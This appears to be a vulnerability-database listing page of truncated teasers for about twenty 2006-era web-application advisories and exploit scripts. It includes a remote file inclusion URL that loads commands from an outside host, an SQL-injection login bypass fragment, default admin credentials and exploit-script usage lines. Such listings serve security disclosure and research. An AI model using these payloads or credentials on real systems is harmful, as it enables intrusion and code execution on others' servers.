[Kurdish Secure Advisory #1] I-RATER Platinum "Admin/configsettings.tpl.php" Remote File Include Vulnerability

Website : http://www.i-rater.com Risk : High Class : Remote References : http://www.securityfocus.com/bid/17623 Credits : B3g0k,Nistiman,Flot,Netqurd and all my friend Remote Code : http://www.site.com/admin/configsettings.tpl.php?includepath=http://www.evilrox.com/cmd.txt?&cmd=id...

warforge.NEWS

warforge.NEWS exploit i've paste it on: http://forum.zone-h.org/viewtopic.php?t=5468 ------------------------------------------------------------------------ ------------------------------------------------------------------ - warforge.NEWS =1.00 Multiple Vulnerabilities - -=...

CVE-2006-2044

The CVE-2006-2044 entry concerns na-img-4.0.34.bin used by the IP3 Networks NetAccess NA75, which ships with a default username and password of admin/admin. The vulnerability is network‑accessible (AV:N, attack vector NETWORK) with no authentication required (Au:N) and yields partial impact to co...

Symantec Scan Engine 5.0.x - Change Admin Password

Symantec Scan Engine 5.0.x - Change Admin Password !/usr/bin/perl -w Remotely change the administrator password or password hash of Symantec Scan Engine. Author: Marc Bevand of Rapid7 Copyright 2006 Rapid7, LLC. All rights reserved. Redistribution and use in source and binary forms, with or witho...

ModernBill multiple SQL inj. vuln.

ModernBill multiple SQL inj. vuln. Vuln. discovered by : r0t Date: 18 april 2006 vendor:www.moderngigabyte.com product link: www.moderngigabyte.net/modernbill/index.htm?ref=homeofmodernbill affected versions:4.3.2 and previous orginal advisory:...

Sphider configset.php settings_dir Parameter Remote File Inclusion

The remote host is running Sphider, an open source web spider and search engine written in PHP. The version of Sphider installed on the remote host fails to sanitize user-supplied input to the 'settingsdir' parameter of the 'admin/configset.php' script before using it in a PHP 'include' function...

CVE-2006-1784

CVE-2006-1784 affects Sphider up to version 1.3. The issue is a PHP remote file inclusion in admin/configset.php via the settings_dir parameter, allowing arbitrary PHP code execution under specific PHP configurations (notably related to register_globals). The problem is triggered when user input ...

Remote file inclusion

PHP remote file inclusion vulnerability in Virtual War VWar 1.5.0 allows remote attackers to execute arbitrary PHP code via a URL in the vwarroot parameter to 1 admin/admin.php, 2 war.php, 3 stats.php, 4 news.php, 5 joinus.php, 6 challenge.php, 7 calendar.php, 8 member.php, 9 popup.php, and other...

phpBB <= 2.0.19 (user_sig_bbcode_uid) Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl r57phpbba2e2.pl - phpBB admin 2 exec exploit version 2 based on usersigbbcodeuid bug tested on 2.0.12 , 2.0.13 , 2.0.19 -------------------------------------------- screen r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password...

SiteMan <= All version SQL injection in admin_login.asp

Vendor : SiteMan Target Page : adminlogin.asp Bug Finder : S3rv3rhack3r administrator panel demo: http://www.ispdemos.com/Demo/SiteMan/adminlogin.asp WWW : http://www.ispofegypt.com/ you can login to adminlogin.asp with user : admin pass : ' or '...

Code injection

Direct static code injection vulnerability in admin/config.php in vscripts aka Kuba Kunkiewicz VNews 1.2 allows remote authenticated administrators to execute code by inserting the code into variables that are stored in admin/config.php...

Aztek Forum 4.00 (myadmin.php) User Privilege Escalation Exploit

Exploit for unknown platform in category web applications ================================================================ Aztek Forum 4.00 myadmin.php User Privilege Escalation Exploit ================================================================ !/usr/bin/perl use IO::Socket; Aztek Forum 4.0...

DVBBS7. 1 SQL Edition cross-database vulnerability-vulnerability warning-the black bar safety net

Author: Gui brother article source: www.54nb.cn Vulnerability test environment:DVBBS7. 1 SQL Affected files admin/admin. asp ..... Exploit select @@version0 to obtain the Windows version number and username='dbo' determine the current system user is not sa select username0 proof the current syste...

nodez 4.6.1.1 mercury - Multiple Vulnerabilities

!/usr/bin/php -q -d shortopentag=on ? echo "Nodez 4.6.1.1 Mercury possibly prior versions multiple vulnerabilities\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; / software: site: nodez.greentinted.com/ description: Nodez - "An open source conten...

Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection

/==========================================/ // AZTEK forums 4.0 multiple vulnerabilities PoC // Product: AZTEK forums // URL: http://www.forum-aztek.com/ // RISK: high /==========================================/ PoC 1- XSS - Post a message including the following line:...

Remote file inclusion

PHP remote file include vulnerability in admin/index.php in Archangel Weblog 0.90.02 allows remote authenticated administrators to execute arbitrary PHP code via a URL ending in a NULL %00 in the index parameter...

CVE-2006-0702

The provided connected Nessus entry confirms a concrete vulnerability in imageVue: versions prior to 16.2 allow unauthenticated remote upload of arbitrary files via admin/upload.php, effectively enabling code execution under the web server’s user context. The issue is described as an unrestricted...

MyBB-1.03.txt

Multible Injections in MyBB 1.03 All injections and vulnerabilities discovered by : HACKERS PAL two days ago i thought to download the new Mybb forum new version files .. and there were the desaster there is many xss and sql injections in the new protected version ... and i made a exploit which g...

dbmanDefault.txt

Tunis the 31/jan/2006 bug found by Fireboy [email protected] Product affected:DBMan for Windows and Unix Product vendor: http://www.gossamer-threads.com the problem with DBman is default passwords these are default pass : admin/admin,author/author,guest/guest if the admin not change the pas...

[Full-disclosure] phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin

Orginal Source: http://securityreason.com/achievementsecurityalert/31 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin Author: Maksymilian Arciemowicz cXIb8O3 Date: 3.2.2006 from SecurityReason.Com CVE-2006-0437 for the XSS issues CVE-2006-0438...